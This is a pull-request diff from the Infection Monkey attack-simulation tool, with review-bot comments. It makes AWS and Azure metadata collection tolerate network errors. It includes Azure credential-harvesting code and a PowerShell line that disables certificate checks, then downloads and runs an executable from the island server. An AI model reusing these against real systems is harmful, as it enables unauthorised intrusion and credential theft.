Merge pull request guardicore#465 from guardicore/463/hotfix/exceptio…
…n-on-aws-network-error

463/hotfix/exception on aws network error -> master
ShayNehmad authored Oct 13, 2019
2 parents b6b58b3 + 177f902 commit 5540007
Showing 6 changed files with 61 additions and 29 deletions.
6 changes: 3 additions & 3 deletions monkey/common/cloud/aws_instance.py
Expand Up @@ -29,14 +29,14 @@ def __init__(self):
AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/instance-id', timeout=2).read()
self.region = self._parse_region(
urllib2.urlopen(AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone').read())
except urllib2.URLError as e:
logger.debug("Failed init of AwsInstance while getting metadata: {}".format(e.message))
except (urllib2.URLError, IOError) as e:
logger.debug("Failed init of AwsInstance while getting metadata: {}".format(e.message), exc_info=True)

try:
self.account_id = self._extract_account_id(
urllib2.urlopen(
AWS_LATEST_METADATA_URI_PREFIX + 'dynamic/instance-identity/document', timeout=2).read())
except urllib2.URLError as e:
except (urllib2.URLError, IOError) as e:
logger.debug("Failed init of AwsInstance while getting dynamic instance data: {}".format(e.message))

@staticmethod
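Review bot: Widening the handler to `(urllib2.URLError, IOError)` does not cover the failure mode most likely on a non-AWS network, because the availability-zone request on the unchanged context line has no timeout while its two siblings use `timeout=2`; a connection that is dropped rather than refused will block `__init__` there. Give it the same bound: `urllib2.urlopen(AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone', timeout=2).read())`. Also, `e.message` is deprecated in Python 2 and is typically empty for IOError instances built with more than one argument, so the new debug line will mostly print nothing useful; prefer `.format(e)`, e.g. `logger.debug("Failed init of AwsInstance while getting metadata: {}".format(e), exc_info=True)`. The second handler did not receive the `exc_info=True` the first one gained; the two should match. `__init__` starts and ends outside this hunk.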
54 changes: 32 additions & 22 deletions monkey/infection_monkey/system_info/__init__.py
Expand Up @@ -113,7 +113,7 @@ def get_network_info(self):
:return: None. Updates class information
"""
LOG.debug("Reading subnets")
self.info['network_info'] =\
self.info['network_info'] = \
{
'networks': get_host_subnets(),
'netstat': NetstatCollector.get_netstat_info()
Expand All @@ -122,28 +122,38 @@ def get_network_info(self):
def get_azure_info(self):
"""
Adds credentials possibly stolen from an Azure VM instance (if we're on one)
Updates the credentials structure, creating it if neccesary (compat with mimikatz)
Updates the credentials structure, creating it if necessary (compat with mimikatz)
:return: None. Updates class information
"""
from infection_monkey.config import WormConfiguration
if not WormConfiguration.extract_azure_creds:
return
LOG.debug("Harvesting creds if on an Azure machine")
azure_collector = AzureCollector()
if 'credentials' not in self.info:
self.info["credentials"] = {}
azure_creds = azure_collector.extract_stored_credentials()
for cred in azure_creds:
username = cred[0]
password = cred[1]
if username not in self.info["credentials"]:
self.info["credentials"][username] = {}
# we might be losing passwords in case of multiple reset attempts on same username
# or in case another collector already filled in a password for this user
self.info["credentials"][username]['password'] = password
if len(azure_creds) != 0:
self.info["Azure"] = {}
self.info["Azure"]['usernames'] = [cred[0] for cred in azure_creds]
# noinspection PyBroadException
try:
from infection_monkey.config import WormConfiguration
if not WormConfiguration.extract_azure_creds:
return
LOG.debug("Harvesting creds if on an Azure machine")
azure_collector = AzureCollector()
if 'credentials' not in self.info:
self.info["credentials"] = {}
azure_creds = azure_collector.extract_stored_credentials()
for cred in azure_creds:
username = cred[0]
password = cred[1]
if username not in self.info["credentials"]:
self.info["credentials"][username] = {}
# we might be losing passwords in case of multiple reset attempts on same username
# or in case another collector already filled in a password for this user
self.info["credentials"][username]['password'] = password
if len(azure_creds) != 0:
self.info["Azure"] = {}
self.info["Azure"]['usernames'] = [cred[0] for cred in azure_creds]
except Exception:
# If we failed to collect azure info, no reason to fail all the collection. Log and continue.
LOG.error("Failed collecting Azure info.", exc_info=True)

def get_aws_info(self):
self.info['aws'] = AwsCollector().get_aws_info()
# noinspection PyBroadException
try:
self.info['aws'] = AwsCollector().get_aws_info()
except Exception:
# If we failed to collect aws info, no reason to fail all the collection. Log and continue.
LOG.error("Failed collecting AWS info.", exc_info=True)
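Review bot: The `try` in `get_azure_info` wraps the whole method body, so a failed `from infection_monkey.config import WormConfiguration`, a misconfigured `extract_azure_creds` flag, or a bug in the dictionary merge below are all reported as "Failed collecting Azure info." with the same ERROR line, which hides the real cause and makes a programming error look like a transient collector failure. Only `extract_stored_credentials()` plausibly fails for environmental reasons; keep the `try` around that call, keep the config gate and the bookkeeping outside it, and replace `if len(azure_creds) != 0:` with `if azure_creds:`. The same narrowing is not needed in `get_aws_info`, whose `try` already covers a single call. Both methods sit entirely inside this hunk.
```python
    def get_azure_info(self):
        # … unchanged: docstring …
        from infection_monkey.config import WormConfiguration
        if not WormConfiguration.extract_azure_creds:
            return
        LOG.debug("Harvesting creds if on an Azure machine")
        if 'credentials' not in self.info:
            self.info["credentials"] = {}
        # noinspection PyBroadException
        try:
            azure_creds = AzureCollector().extract_stored_credentials()
        except Exception:
            # Only the collector itself is best-effort; a failure here must not abort the rest of collection.
            LOG.error("Failed collecting Azure info.", exc_info=True)
            return
        # … unchanged: per-credential merge into self.info["credentials"] …
        if azure_creds:
            self.info["Azure"] = {}
            self.info["Azure"]['usernames'] = [cred[0] for cred in azure_creds]
```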
1 change: 1 addition & 0 deletions monkey/monkey_island/cc/environment/aws.py
Expand Up @@ -9,6 +9,7 @@
class AwsEnvironment(Environment):
def __init__(self):
super(AwsEnvironment, self).__init__()
# Not suppressing error here on purpose. This is critical if we're on AWS env.
self.aws_info = AwsInstance()
self._instance_id = self._get_instance_id()
self.region = self._get_region()
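Review bot: The new comment "Not suppressing error here on purpose" is misleading at the line it annotates, because `AwsInstance.__init__` (first file in this commit) catches `URLError`/`IOError` itself and only logs them, so a metadata fetch failure never raises from `self.aws_info = AwsInstance()`; if anything surfaces, it presumably comes from `self._get_instance_id()` / `self._get_region()` operating on attributes that were never set — confirm against those helpers, which are outside the hunk. Reword it so the next reader does not rely on a raise that cannot happen here: `# AwsInstance() swallows metadata fetch errors itself; on AWS a failure surfaces (if at all) from the getters below, and is deliberately not caught.` The enclosing `__init__` continues past the hunk.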
14 changes: 13 additions & 1 deletion monkey/monkey_island/cc/services/remote_run_aws.py
@@ -1,3 +1,5 @@
import logging

from monkey_island.cc.services.config import ConfigService
from common.cloud.aws_instance import AwsInstance
from common.cloud.aws_service import AwsService
Expand All @@ -7,6 +9,8 @@

__author__ = "itay.mizeretz"

logger = logging.getLogger(__name__)


class RemoteRunAwsService:
aws_instance = None
Expand All @@ -23,7 +27,15 @@ def init():
:return: None
"""
if RemoteRunAwsService.aws_instance is None:
RemoteRunAwsService.try_init_aws_instance()

@staticmethod
def try_init_aws_instance():
# noinspection PyBroadException
try:
RemoteRunAwsService.aws_instance = AwsInstance()
except Exception:
logger.error("Failed init aws instance. Exception info: ", exc_info=True)

@staticmethod
def run_aws_monkeys(instances, island_ip):
Expand Down Expand Up @@ -119,7 +131,7 @@ def _get_run_monkey_cmd_windows_line(bit_text, island_ip):
return r"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {" \
r"$true}; (New-Object System.Net.WebClient).DownloadFile('https://" + island_ip + \
r":5000/api/monkey/download/monkey-windows-" + bit_text + r".exe','.\\monkey.exe'); " \
r";Start-Process -FilePath '.\\monkey.exe' -ArgumentList 'm0nk3y -s " + island_ip + r":5000'; "
r";Start-Process -FilePath '.\\monkey.exe' -ArgumentList 'm0nk3y -s " + island_ip + r":5000'; "

@staticmethod
def _get_run_monkey_cmd_line(is_linux, is_64bit, island_ip):
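Review bot: `try_init_aws_instance` leaves `RemoteRunAwsService.aws_instance` as `None` after a failure without saying so, and `init()` will then retry the construction (and its metadata requests) on every call because the `is None` guard never clears; callers that dereference `aws_instance` need to know this contract. Add a docstring stating it: `"""Try to construct the shared AwsInstance once; on any failure log it and leave aws_instance as None, so init() retries on its next call and callers must expect None."""`. The log text `"Failed init aws instance. Exception info: "` ends in a dangling label that `exc_info=True` already supplies; `"Failed to init AwsInstance."` reads cleaner. The `init()` method begins outside the hunk; the `_get_run_monkey_cmd_windows_line` hunk below is an indentation-only change.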
2 changes: 2 additions & 0 deletions monkey/monkey_island/cc/services/reporting/aws_exporter.py
Expand Up @@ -24,6 +24,7 @@ def handle_report(report_json):
logger.info('No issues were found by the monkey, no need to send anything')
return True

# Not suppressing error here on purpose.
current_aws_region = AwsInstance().get_region()

for machine in issues_list:
Expand Down Expand Up @@ -70,6 +71,7 @@ def _prepare_finding(issue, region):
configured_product_arn = load_server_configuration_from_file()['aws'].get('sec_hub_product_arn', '')
product_arn = 'arn:aws:securityhub:{region}:{arn}'.format(region=region, arn=configured_product_arn)
instance_arn = 'arn:aws:ec2:' + str(region) + ':instance:{instance_id}'
# Not suppressing error here on purpose.
account_id = AwsInstance().get_account_id()
logger.debug("aws account id acquired: {}".format(account_id))

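Review bot: Both new "Not suppressing error here on purpose." comments sit on `AwsInstance()` constructions, but per the first file in this commit the constructor swallows its own `URLError`/`IOError`, so the thing that is "not suppressed" is whatever `get_region()` / `get_account_id()` do with missing data — presumably a `None` return or an AttributeError; confirm, and say which in the comment, e.g. `# Deliberately not caught: a report cannot be exported without a region, so let the failure propagate.` Separately, `_prepare_finding` builds a fresh `AwsInstance()` on every call, which from the first hunk means two timed HTTP requests to the metadata service each time; if it runs once per issue, the account id is refetched per finding, so consider resolving it once in `handle_report` and passing it alongside `region`. Both `handle_report` and `_prepare_finding` start outside their hunks.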
13 changes: 10 additions & 3 deletions monkey/monkey_island/cc/services/reporting/exporter_init.py
Expand Up @@ -9,11 +9,18 @@

def populate_exporter_list():
manager = ReportExporterManager()
RemoteRunAwsService.init()
if RemoteRunAwsService.is_running_on_aws() and ('aws' == env.get_deployment()):
manager.add_exporter_to_list(AWSExporter)
try_add_aws_exporter_to_manager(manager)

if len(manager.get_exporters_list()) != 0:
logger.debug(
"Populated exporters list with the following exporters: {0}".format(str(manager.get_exporters_list())))


def try_add_aws_exporter_to_manager(manager):
# noinspection PyBroadException
try:
RemoteRunAwsService.init()
if RemoteRunAwsService.is_running_on_aws() and ('aws' == env.get_deployment()):
manager.add_exporter_to_list(AWSExporter)
except Exception:
logger.error("Failed adding aws exporter to manager. Exception info:", exc_info=True)
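Review bot: `try_add_aws_exporter_to_manager` lacks a docstring, and its name suggests a boolean result while it returns nothing; document what it promises, e.g. `"""Register AWSExporter when the Island runs on AWS; on any failure log it and leave the manager unchanged."""`. Note that `RemoteRunAwsService.init()` already catches `Exception` internally in this same commit, so the outer `try` here only adds coverage for `is_running_on_aws()` and `env.get_deployment()`; a one-line comment saying that would stop the next maintainer from assuming the two layers are redundant and removing one. The helper is module-internal, so a leading underscore (`_try_add_aws_exporter_to_manager`) would mark it as such. Both functions are fully inside the hunk.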
